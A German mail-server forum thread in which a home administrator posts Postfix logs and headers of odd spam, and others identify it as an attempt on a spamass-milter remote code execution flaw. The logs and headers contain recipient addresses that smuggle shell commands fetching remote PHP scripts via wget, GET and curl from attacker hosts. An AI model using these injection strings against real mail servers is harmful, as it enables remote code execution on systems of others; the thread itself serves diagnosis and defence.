Seltsame Spam Mail

Status
Für weitere Antworten geschlossen.

viechi

Benutzer
Mitglied seit
26. Feb 2010
Beiträge
6
Punkte für Reaktionen
0
Punkte
0
Hallo Leute!

Ich habe seit einigen Tagen meinen Mailserver in Betrieb, funktioniert soweit sehr gut.
Auch habe ich das erweiterte Logging wie hier im Forum beschrieben eingerichtet und prüfe täglich die Logs, weil ich anfangs natürlich genau wissen will, was am Server so gespielt wird. Neben vielen Spams auf geblockte Adressen und gescheiterten Login Versuchen mit den üblichen Benutzern wie root, admin etc. ist mir heute etwas seltsames aufgefallen.

Vorweg, ich bin weit davon entfernt ein Mailprofi zu sein, deshalb verstehe ich das nicht wirklich, was da passiert ist. Vielleicht noch zur Info, ich mache auf meine Domain ein catch-all wobei ich in einer Blacklist eine Gruppe von ca. 20 Mailadressen habe, auf die ich ein reject ausführe.

Normalerweise kommen Spam Mails auf Adressen, mit denen ich mich irgendwo registriert habe. Diesmal allerdings kamen mehrere Mails auf ein Konto, mit dem ich sicher nirgends registriert bin. Das Ungewöhnliche daran, es entspricht genau meinem Kontonamen, an den ich alle mit catch-all eingefangenen Mails weitergebe.

Ich habe zwar beim Einrichten des Mailservers einige Testmails vom Account meines Internet Providers direkt an diesen Account geschickt, aber das war's. Die reject Mails habe ich geprüft, in denen scheint keinerlei Info über den Account Namen im Mailbody auf.
Außerdem rufe ich per Handy immer wieder Mails von meinem Mailserver ab, wobei ich natürlich als Benutzer Login diesen Namen angebe.

Aber hey, bei meinem ISP oder beim externen Abrufen von Mails per Handy die Schwachstelle zu suchen finde ich doch etwas weit hergeholt.

An meinem Router habe ich die Ports 25, 110, 993 und 995 auf den Server geforwareded. Webmail ist für außen nicht freigeschaltet.

Daher meine Frage an alle, die ein wenig mehr Ahnung von dem Zeug haben als ich, was glaubt ihr woher das kommt?

Hier noch ein paar Logeinträge - meine IP kommt hier nirgends vor, meinen Kontonamen habe ich wie meine domain anonymisiert. Hier scheint es, als ob über diese seltsamen Mails ein paar Schädlings PHP Scripts mit Hilfe des User root runtergeladen werden sollten:
Rich (BBCode):
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: connect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: connect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: 9FB3E18B3A6: client=mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: 9FB3E18B3A6: client=mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/cleanup[3703]: 9FB3E18B3A6: message-id=<20100315043747.9FB3E18B3A6@mydomain>
Mar 15 05:37:47 MailStation postfix/cleanup[3703]: 9FB3E18B3A6: message-id=<20100315043747.9FB3E18B3A6@mydomain>
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: from=<blue@dick.com>, size=295, nrcpt=3 (queue active)
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: from=<blue@dick.com>, size=295, nrcpt=3 (queue active)
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: disconnect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/smtpd[3699]: disconnect from mail.modaintl.com[68.236.170.186]
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|wget http://61.100.185.177/busy-1.php>, relay=local, delay=0.38, delays=0.25/0.12/0/0.02, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|wget http://61.100.185.177/busy-1.php>, relay=local, delay=0.38, delays=0.25/0.12/0/0.02, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|GET http://61.100.185.177/busy-2.php>, relay=local, delay=0.4, delays=0.25/0.13/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|GET http://61.100.185.177/busy-2.php>, relay=local, delay=0.4, delays=0.25/0.13/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|curl http://61.100.185.177/busy-3.php>, relay=local, delay=0.41, delays=0.25/0.15/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/local[3704]: 9FB3E18B3A6: to=<account@mydomain>, orig_to=<root+:|curl http://61.100.185.177/busy-3.php>, relay=local, delay=0.41, delays=0.25/0.15/0/0.01, dsn=2.0.0, status=sent (delivered to maildir)
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: removed
Mar 15 05:37:47 MailStation postfix/qmgr[2850]: 9FB3E18B3A6: removed

Nebenbei, ich habe auch noch sämtliche Logs seit Inbetriebnahme aufbewahrt.

Natürlich will ich euch die Mails, die ich auf diesen Account bekommen habe nicht vorenthalten, zumind. mal eines davon. Der Rest sieht eigentlich gleich aus bis auf den busy-1, das wechselt:
Rich (BBCode):
Return-Path: <blue@dick.com>
X-Original-To: "root+:|wget http://61.100.185.177/busy-1.php"
Delivered-To: account@mydomain
Received: from bluedick (mail.modaintl.com [68.236.170.186])
	by mydomain (Postfix) with SMTP id C9B3E18B3A6;
	Mon, 15 Mar 2010 19:53:35 +0100 (CET)
Message-Id: <20100315185340.C9B3E18B3A6@mydomain>
Date: Mon, 15 Mar 2010 19:53:35 +0100 (CET)
From: blue@dick.com
To: undisclosed-recipients:;
 

viechi

Benutzer
Mitglied seit
26. Feb 2010
Beiträge
6
Punkte für Reaktionen
0
Punkte
0
Alles klar

Den Namen meines Kontos haben die ja nicht herausbekommen. Der Empfänger in der Mail war ursprünglich der "root" Benutzer.

Mein Kontoname ist in der Mail zu finden, weil die Mail an die "root" Adresse dann weiter an mein Konto geleitet wurde - hab' mich wohl ein wenig verguckt :eek:.
 

itari

Benutzer
Mitglied seit
15. Mai 2008
Beiträge
21.900
Punkte für Reaktionen
14
Punkte
0
Also kein echtes Ausspionieren oder so?

Itari
 

viechi

Benutzer
Mitglied seit
26. Feb 2010
Beiträge
6
Punkte für Reaktionen
0
Punkte
0
Nein, kein Ausspionieren.
Hab' auch meine Router Logs gechecked, da war nichts.

Aber im ersten Moment war ich echt baff, aber ich hab' mich wirklich nur verschaut bez. der Empfängeradresse - sorry falls ich euch beunruhigt habe.
 

cepstrum

Benutzer
Mitglied seit
13. Apr 2010
Beiträge
1
Punkte für Reaktionen
0
Punkte
0
Spamassassin Milter Plugin Vulnerability

Hallo,
da wird versucht eine Sicherheitslücke im Spamassassin Milter Plugin auszunutzen. dadurch wird das Kommando im RCPT-TO mit dem root account ausgeführt.

Mail bei mir war (URL mit Unterstrichen ___ ungültig gemacht und meinen Hostname, Message ID entfernt):
From blue@ dick.com Sat Apr 10 09:23:06 2010
Return-Path: <blue@dick.com>
X-Original-To: "root+:|wget http://___fortunes.in/x1x.php"
Delivered-To: "root+:|wget http://___fortunes.in/x1x.php"@MY-REVERSE-DNS
Received: from bluedick (unknown [208.88.6.50])
by MY-REVERSE-DNS (Postfix) with SMTP id XXXXXXXXXX
for <"root+:|wget http://___fortunes.in/x1x.php">; Sat, 10 Apr 2010 09:23:$
Message-Id: <--- REMOVED ---@MY-REVERSE-DNS>
Date: Sat, 10 Apr 2010 09:23:06 +0200 (CEST)
From: blue@ dick.com
To: undisclosed-recipients:;
Status: RO
Content-Length: 0
Lines: 0

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

Also zumindest potentiell gefährlich.
 

jahlives

Benutzer
Mitglied seit
19. Aug 2008
Beiträge
18.275
Punkte für Reaktionen
4
Punkte
0
The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
Das wird wohl aber nur gefährlich werden wenn der Spamassassin Prozess bereits unter root läuft. Wenn der Scanprozess unter einem un-privilegierten User läuft, dann kannst du keine root Rechte erlangen.
Ich würde nie einen von aussen erreichbaren Maildienst unter root laufen lassen resp Mails für root immer auf einen unprivilegierten User mittels aliases weiterleiten
 
Status
Für weitere Antworten geschlossen.
 

Kaffeautomat

Wenn du das Forum hilfreich findest oder uns unterstützen möchtest, dann gib uns doch einfach einen Kaffee aus.

Als Dankeschön schalten wir deinen Account werbefrei.

:coffee:

Hier gehts zum Kaffeeautomat